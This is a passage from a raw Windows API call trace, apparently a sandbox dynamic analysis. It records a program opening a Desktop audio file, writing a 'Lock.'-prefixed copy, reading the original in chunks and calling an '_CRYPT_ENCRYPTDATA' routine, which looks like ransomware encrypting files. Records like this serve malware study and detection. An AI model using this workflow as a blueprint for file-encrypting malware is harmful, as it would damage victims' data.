dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0130.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0130.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0130.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0130.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e80330 [0130.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0130.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0130.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/2a44Hi4EE Lmnc.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\2a44hi4ee lmnc.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0130.467] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.467] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0130.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0130.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0130.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0130.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0130.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0130.468] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0130.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0130.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0130.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e90338 [0130.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0130.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0130.468] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.2a44Hi4EE Lmnc.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.2a44hi4ee lmnc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0130.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0130.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0130.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0130.473] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0130.473] ReadFile (in: hFile=0x2a0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0130.476] ReadFile (in: hFile=0x2a0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x651a, lpOverlapped=0x0) returned 1 [0130.478] ReadFile (in: hFile=0x2a0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0130.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0130.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0130.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be1020 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0130.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0130.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0130.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0130.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0130.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.488] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0130.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0130.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0130.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0130.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0130.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0130.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0130.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1651a) returned 0x2ea0340 [0130.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0130.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0130.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0130.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0130.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0130.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0130.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1651a) returned 0x2eccd90 [0130.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0130.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0130.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0130.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0130.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0130.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0130.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0130.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0130.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 